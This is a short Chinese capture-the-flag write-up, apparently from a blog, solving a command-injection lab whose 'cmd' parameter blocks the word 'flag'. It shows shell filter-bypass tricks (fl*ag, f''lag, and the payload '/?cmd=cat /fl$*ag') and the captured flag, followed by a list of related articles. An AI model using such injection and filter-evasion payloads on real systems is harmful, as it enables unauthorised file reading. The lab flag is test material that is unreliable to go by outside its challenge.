开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
扑火的小飞蛾3 小时前
网络安全小白学习路线图 (基于提供文档库)计算机程序设计小李同学4 小时前
个人数据管理系统电商API&Tina5 小时前
京东 API 数据采集接口接入与行业分析上海云盾商务经理杨杨8 小时前
2026年等保测评终极指南:新规解读、策略选择与一站式服务深度剖析黄焖鸡能干四碗9 小时前
信息安全网络安全评估报告(WORD)m0_738120729 小时前
应急响应——知攻善防靶场Linux-1详细应急过程Sammyyyyy10 小时前
Symfony AI 正式发布,PHP 原生 AI 时代开启pps-key11 小时前
Afrog漏洞扫描器:从入门到入狱......边缘的摇摆记录(pps-key黑化版)白帽黑客-晨哥11 小时前
授权单位实战+专属应急队,湖南省网安基地如何用真实项目与应急响应锻造安全精英码农水水12 小时前
大疆Java面试被问:TCC事务的悬挂、空回滚问题解决方案